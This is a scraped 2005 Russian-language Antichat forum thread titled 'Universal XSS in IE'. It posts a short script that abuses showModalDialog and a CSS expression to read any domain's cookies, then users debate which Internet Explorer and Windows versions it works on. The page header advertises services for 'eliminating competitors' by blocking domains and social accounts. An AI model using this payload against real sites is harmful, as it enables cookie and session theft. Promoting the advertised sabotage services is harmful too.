УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Универсальный Xss в Ie

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Универсальный Xss в Ie

20.06.2005, 22:00

JazzzSummerMan

Постоянный

Регистрация: 07.04.2004

Сообщений: 387

Провел на форуме:
293464

Репутация: 42

Универсальный Xss в Ie

с помощью этого скрипта можно получить доступ к cookies любого домена

Код:

<SCRIPT>
showModalDialog("http://forum.antichat.ru",null,"font-size:expression(window.execScript(unescape('alert%28%22Domain%3A%22+document.domain+%22%5CnCookie%3A%22+document.cookie%29%3Bwindow.close%28%29%3B')))");
</SCRIPT>

взял с секлаба

20.06.2005, 22:21

censored!

Green member - Level 3

Регистрация: 02.11.2004

Сообщений: 1,337

Провел на форуме:
2398258

Репутация: 648

Там в верху год пишется: 4 декабря 2002

20.06.2005, 22:27

JazzzSummerMan

Постоянный

Регистрация: 07.04.2004

Сообщений: 387

Провел на форуме:
293464

Репутация: 42

да хоть 99-й

20.06.2005, 22:29

censored!

Green member - Level 3

Регистрация: 02.11.2004

Сообщений: 1,337

Провел на форуме:
2398258

Репутация: 648

И у тебя он пашет???

20.06.2005, 22:31

JazzzSummerMan

Постоянный

Регистрация: 07.04.2004

Сообщений: 387

Провел на форуме:
293464

Репутация: 42

хм.. пашет..

форум просто меняет код. вот в тхт если что

Вложения

x.txt (228 байт, 40 просмотров)

Последний раз редактировалось JazzzSummerMan; 20.06.2005 в 22:34..

20.06.2005, 22:31

Че Гевара

Администратор

Регистрация: 05.10.2003

Сообщений: 1,083

Провел на форуме:
4618051

Репутация: 45

Да дело не в этом, просто в большинстве броузеров это не сработает ...
xp sp2 не пашет, на sp1 думаю тоже ...
ИМХО, только на IE ниже 5 версии (или 5, хз)

Надо проверить ...

Цитата:

хм.. пашет..

хехе, на тебе что не проверяй - все пашет ))

Последний раз редактировалось Че Гевара; 20.06.2005 в 22:34..

20.06.2005, 22:36

JazzzSummerMan

Постоянный

Регистрация: 07.04.2004

Сообщений: 387

Провел на форуме:
293464

Репутация: 42

Работает в шестой версии, проверялось на XPSP1, ну и на Win 98)
да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE

20.06.2005, 22:50

Че Гевара

Администратор

Регистрация: 05.10.2003

Сообщений: 1,083

Провел на форуме:
4618051

Репутация: 45

Цитата:

да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE

Тут дело в изменениях в плане безопасности, появившихся во втором сервис паке + некоторые другие факторы, такие как наличие фаервола с фильтрацией интерактивных элементов, наличе, изменения каких-либо настроек (в частности отключение ActiveX ) и т.п. ...

Кстати, вот например эксплоит с переполнением буфера через <iframe> работает только на xp или xp sp1. Под 2k или sp2 он просто вешает осла, при этом никакие команды не выполняются.
Так что от ОС очень даже зависит ...

Последний раз редактировалось Че Гевара; 20.06.2005 в 22:53..

20.06.2005, 23:07

JazzzSummerMan

Постоянный

Регистрация: 07.04.2004

Сообщений: 387

Провел на форуме:
293464

Репутация: 42

Ну почти.. я не то немного имел ввиду. Здесь именно такая уязвимость имхо
Вот ДоС или переполнения буфера зависят от ОС, а здесь уже не затрагивается движок проводника, а ошибка чисто в надстройках, поэтому и говорю. Ну если конечно рассматривать что в Sp входят патчи для Ie, то и от неё зависит. короче, ладно))